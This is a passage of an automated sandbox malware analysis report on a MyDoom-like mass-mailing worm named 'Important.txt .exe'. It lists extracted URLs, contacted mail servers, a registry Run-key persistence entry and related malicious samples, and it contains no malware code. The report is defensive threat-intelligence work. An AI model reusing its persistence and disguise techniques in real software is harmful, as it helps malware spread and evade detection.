http://www.powershellmagazine.com/2014/03/12/get-started-with-pester-powershell-unit-testing-framewo	.exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/cleardot.gif	.exe, 00000000.00000003.559474024.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.548767791.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.546573673.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.556779529.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000081C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.529091909.000000000095B000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.360769423.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.0000000000816000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.000000000083A000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.368417616.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431539132.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.550675478.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.557389244.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409098810.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.remix3d.com	.exe, 00000000.00000003.450072898.00000000008B6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/powershell/powershell-tests)	.exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pester/pester/wiki/what	.exe, 00000000.00000003.487995373.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://payments.google.com/payments/v4/js/integrator.js	.exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.351716534.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/msangcwam	.exe, 00000000.00000003.434976951.000000000086C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlineconnect.srf?id=80601	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlineconnect.srf?id=80604	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlineconnect.srf?id=80603	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlinelogin.srf?id=80608	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xbox-pay.chinatvpay.com/	.exe, 00000000.00000003.546960080.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.549795782.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.554113149.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.powershellmagazine.com/2014/03/27/testing-your-powershell-scripts-with-pester-assertions-	.exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlinelogin.srf?id=80605	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/integrator.js	.exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.351716534.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/x2.gif	.exe, 00000000.00000003.559474024.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.548767791.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.546573673.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.556779529.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000081C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.529091909.000000000095B000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.360769423.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.0000000000816000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.000000000083A000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.368417616.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431539132.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.550675478.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.557389244.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409098810.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://accounts.google.com/mergesession	.exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.351716534.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527414235.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409113422.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000002.564291107.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527841033.0000000000890000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527841033.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527618971.000000000087A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlinelogin.srf?id=80604	.exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pester/pester/wiki)	.exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlinelogin.srf?id=80607	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlinelogin.srf?id=80606	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/mitchellh/vagrant/blob/master/changelog.md)	.exe, 00000000.00000003.488463923.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.488884050.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wallet.microsoft-ppe.com	.exe, 00000000.00000003.506524395.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.506829046.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.live-int.com/ppsecure/inlinelogin.srf?id=80603	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/dot2.gif	.exe, 00000000.00000003.559474024.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.548767791.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.546573673.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.556779529.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000081C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.529091909.000000000095B000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.360769423.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.0000000000816000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.000000000083A000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.368417616.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431539132.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.550675478.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.557389244.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409098810.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live-int.com/ppsecure/inlinepopauth.srf?id=80605	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/accounts/oauthlogin?issueuberauth=1	.exe, 00000000.00000003.559474024.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.351716534.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527414235.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403637094.000000000083A000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.546168419.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527841033.0000000000890000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527841033.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527618971.000000000087A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live-int.com/msangcwam	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://build.powershell.org/project.html?projectid=pester&tab=projectoverview&guest=1)	.exe, 00000000.00000003.487995373.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/google/closure-library/wiki/goog.module:-an-es6-module-like-alternative-to-goog.p	.exe, 00000000.00000003.403054458.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.microsoft-int.com/?ref=settings	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://build.powershell.org/guestauth/app/rest/builds/buildtype:(id:pester_testpester)/statusicon)	.exe, 00000000.00000003.487995373.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.domini.cat/~anna_maria/	.exe, 00000000.00000003.474480239.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://groups.google.com/forum/?fromgroups#	.exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.adobe.	.exe, 00000000.00000003.474480239.000000000086C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://accounts.google.cX	.exe, 00000000.00000003.546168419.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www-googleapis-staging.sandbox.google.com	.exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp	false		high
http://scottmuc.com/blog/development/pester-bdd-for-the-system-administrator/)	.exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.490395425.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
159.253.31.95	silly.haxx.se	Sweden	42708	PORTLANEwwwportlanecomSE	false
104.47.22.161	msn-com.olc.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
85.187.148.2	gzip.org	United States	55293	A2HOSTINGUS	false
212.19.106.223	mx.leonet.it	Italy	15691	LEONET-AS-IT	false
185.253.212.68	blackhole.aftermarket.pl	Poland	48707	GREENER-ASPL	false
94.100.180.31	mxs.mail.ru	Russian Federation	47764	MAILRU-ASMailRuRU	false
185.132.181.97	mxb-00377f01.gslb.pphosted.com	Netherlands	52129	PROOFPOINT-ASN-EUGB	false
80.75.42.227	smx01.a1.net	Austria	16305	A1TelekomAT	false
148.163.139.28	incoming-relays.illinois.edu	United States	22843	PROOFPOINT-ASN-US-EASTUS	false
198.252.153.129	mx1.riseup.net	United States	16652	RISEUPUS	false
195.29.173.138	ma-01.vlada.hr	Croatia (LOCAL Name: Hrvatska)	5391	T-HTCroatianTelecomIncHR	false
104.47.0.36	vub-ac-be.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
165.227.159.144	mail.h-email.net	United States	14061	DIGITALOCEAN-ASNUS	false
67.195.228.86	mx-aol.mail.gm0.yahoodns.net	United States	36647	YAHOO-GQ1US	false
64.29.151.236	ismtp.sitestar.everyone.net	United States	30447	INFB2-ASUS	false
51.81.61.70	mx01.earthlink-vadesecure.net	United States	16276	OVHFR	false
104.47.56.161	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
131.111.8.146	mx.cam.ac.uk	United Kingdom	786	JANETJiscServicesLimitedGB	false
140.78.3.83	mail3.edvz.uni-linz.ac.at	Austria	1205	JKU-LINZ-ASUniversityLinzAT	false
209.51.188.92	eggs.gnu.org	United States	22989	FREEASINFREEDOMUS	false
192.254.190.168	onlineconnections.com.au	United States	46606	UNIFIEDLAYER-AS-1US	false
104.47.66.10	alumni-caltech-edu.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.136.8.41	mx1c50.megamailservers.eu	United Kingdom	9115	INFB-AS9115GB	false
96.47.154.206	smtp.litwareinc.com	United States	23314	ORLANDOTELCOUS	false
98.136.96.91	mta6.am0.yahoodns.net	United States	36646	YAHOO-NE1US	false
142.250.27.27	gmail-smtp-in.l.google.com	United States	15169	GOOGLEUS	false
142.250.27.26	aspmx.l.google.com	United States	15169	GOOGLEUS	false
104.47.57.110	abc-org.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
131.107.55.31	mail.fabrikam.com	United States	3598	MICROSOFT-CORP-ASUS	false
104.47.11.202	autoitscript-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.93.212.0	microsoft-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.102.26	unknown	United States	15169	GOOGLEUS	false
104.47.73.10	adobe-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
44.238.161.41	mx2.mailchannels.net	United States	16509	AMAZON-02US	false
153.127.71.68	linuxnet.com	Japan	7684	SAKURA-ASAKURAInternetIncJP	false
131.107.88.24	mail.adatum.com	United States	3598	MICROSOFT-CORP-ASUS	false
178.218.165.214	mail.dva.hr	Croatia (LOCAL Name: Hrvatska)	198785	SEDMIODJEL-ASHR	false
64.147.108.52	pb-mx11.pobox.com	United States	11403	NYINTERNETUS	false

Private

IP
192.168.2.1
192.168.2.5

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	811855
Start date and time:	2023-02-20 09:49:28 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	.exe
Original Sample Name:	Important.txt .exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@2/11@439/40
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 15.4% (good quality ratio 13.5%) Quality average: 59.8% Quality standard deviation: 30.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 17.72.136.242
Excluded domains from analysis (whitelisted): apple.com, client.wns.windows.com, adobe.com, mx-in.g.apple.com, ctldl.windowsupdate.com, microsoft.com
Execution Graph export aborted for target Jammer2nd.exe, PID 4740 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: .exe

Simulations

Behavior and APIs

Time	Type	Description
09:50:28	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Jammer2nd C:\Windows\Jammer2nd.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
159.253.31.95	.exe	Get hash	malicious	Unknown	Browse
	document_excel.exe	Get hash	malicious	Unknown	Browse
	data.exe	Get hash	malicious	Unknown	Browse
	AHnFoINkgu.exe	Get hash	malicious	MyDoom	Browse
	document.exe	Get hash	malicious	MyDoom	Browse
	document.htm .exe	Get hash	malicious	MyDoom	Browse
	ATTACHMENT.exe	Get hash	malicious	MyDoom	Browse
	ihdgexm.exe	Get hash	malicious	MyDoom	Browse
	letter.exe	Get hash	malicious	MyDoom	Browse
	readme.exe	Get hash	malicious	MyDoom	Browse
	ATTACHMENT.exe	Get hash	malicious	MyDoom	Browse
	ihdgexm.exe	Get hash	malicious	MyDoom	Browse
	letter.exe	Get hash	malicious	MyDoom	Browse
	readme.exe	Get hash	malicious	MyDoom	Browse
	document.exe	Get hash	malicious	MyDoom	Browse
	document.exe	Get hash	malicious	MyDoom	Browse
	Message.exe	Get hash	malicious	MyDoom	Browse
	Message.exe	Get hash	malicious	MyDoom	Browse
	attachment.html .exe	Get hash	malicious	MyDoom	Browse
	attachment.html .exe	Get hash	malicious	MyDoom	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ismtp.sitestar.everyone.net	.exe	Get hash	malicious	Unknown	Browse	64.29.151.236
	document_excel.exe	Get hash	malicious	Unknown	Browse	64.29.151.236
	data.exe	Get hash	malicious	Unknown	Browse	64.29.151.236
	file.log.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	data.log.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	message.txt.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	test.dat.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	Update-KB7390-x86.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	Update-KB6734-x86.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	Update-KB5058-x86.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	file.txt.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	Update-KB250-x86.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	Update-KB2984-x86.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	doc.msg.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	test.msg.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	Update-KB3756-x86.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	body.elm.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	readme.txt.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	Update-KB9504-x86.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
	Update-KB6340-x86.exe	Get hash	malicious	Unknown	Browse	216.200.145.235
silly.haxx.se	.exe	Get hash	malicious	Unknown	Browse	159.253.31.95
	SecuriteInfo.com.Win32.HLLM.MyDoom.54464.3216.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	document_excel.exe	Get hash	malicious	Unknown	Browse	159.253.31.95
	.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	data.exe	Get hash	malicious	Unknown	Browse	159.253.31.95
	AHnFoINkgu.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	document.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	document.htm .exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	ATTACHMENT.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	ihdgexm.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	letter.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	readme.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	ATTACHMENT.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	ihdgexm.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	letter.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	readme.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	document.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	document.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	Message.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95
	Message.exe	Get hash	malicious	MyDoom	Browse	159.253.31.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PORTLANEwwwportlanecomSE	.exe	Get hash	malicious	Unknown	Browse	159.253.31.95
	lOJvrWGoPj.exe	Get hash	malicious	Unknown	Browse	46.246.84.14
	bJ5I.exe	Get hash	malicious	Njrat	Browse	46.246.12.6
	bJ1V.exe	Get hash	malicious	Njrat	Browse	46.246.4.2
	bJ1S.exe	Get hash	malicious	AveMaria, UACMe	Browse	46.246.4.2
	bJ11.exe	Get hash	malicious	Quasar	Browse	46.246.14.21
	bJy1.exe	Get hash	malicious	Njrat	Browse	46.246.86.3
	bunzipped.exe	Get hash	malicious	Njrat	Browse	46.246.86.18
	bJvF.exe	Get hash	malicious	AsyncRAT	Browse	46.246.80.9
	bJu9.exe	Get hash	malicious	Njrat	Browse	46.246.6.22
	xs6Wrp6hsMa5.exe	Get hash	malicious	Njrat	Browse	46.246.86.17
	bJpu.exe	Get hash	malicious	Njrat	Browse	46.246.86.18
	bunzipped.exe	Get hash	malicious	Njrat	Browse	46.246.84.5
	bJk7.exe	Get hash	malicious	Njrat	Browse	46.246.4.3
	6652-PNG.vbs	Get hash	malicious	Njrat	Browse	46.246.4.7
	bJi7.exe	Get hash	malicious	AveMaria, UACMe	Browse	46.246.12.4
	tmppctljblp.vbs	Get hash	malicious	Njrat	Browse	46.246.82.5
	Bomolovo.exe	Get hash	malicious	Njrat	Browse	46.246.14.17
	PURCHASE ORDER & SAMPLE IMAGE.xlsx	Get hash	malicious	Unknown	Browse	5.249.163.12
	xZ4qYy7mM92m.exe	Get hash	malicious	Remcos	Browse	46.246.26.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	MEDX02213.exe	Get hash	malicious	AveMaria, DarkTortilla, UACMe	Browse	20.90.152.133 20.90.156.32
	NEW ORDER.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
	FedEx Receipt_1022355161763.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
	AWB #3827747403.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
	IMG 02-20-2023 Order 45678.exe	Get hash	malicious	AveMaria, UACMe	Browse	20.90.152.133 20.90.156.32
	Quote=AHB23QA.pdf.exe	Get hash	malicious	DarkTortilla	Browse	20.90.152.133 20.90.156.32
	attached sample.exe	Get hash	malicious	Nanocore, AgentTesla	Browse	20.90.152.133 20.90.156.32
	Invoice.exe	Get hash	malicious	Nanocore, AgentTesla	Browse	20.90.152.133 20.90.156.32
	SecuriteInfo.com.Variant.Tedy.228780.19809.28066.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
	xvfBDQqhyr.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
	z7woofZSAY.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
	DHL_DELIVERY_CONFIRMATION_CBJ170220233022231101.exe	Get hash	malicious	Vector Stealer	Browse	20.90.152.133 20.90.156.32
	file.exe	Get hash	malicious	Xmrig	Browse	20.90.152.133 20.90.156.32
	Copia de remesa_pdf.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
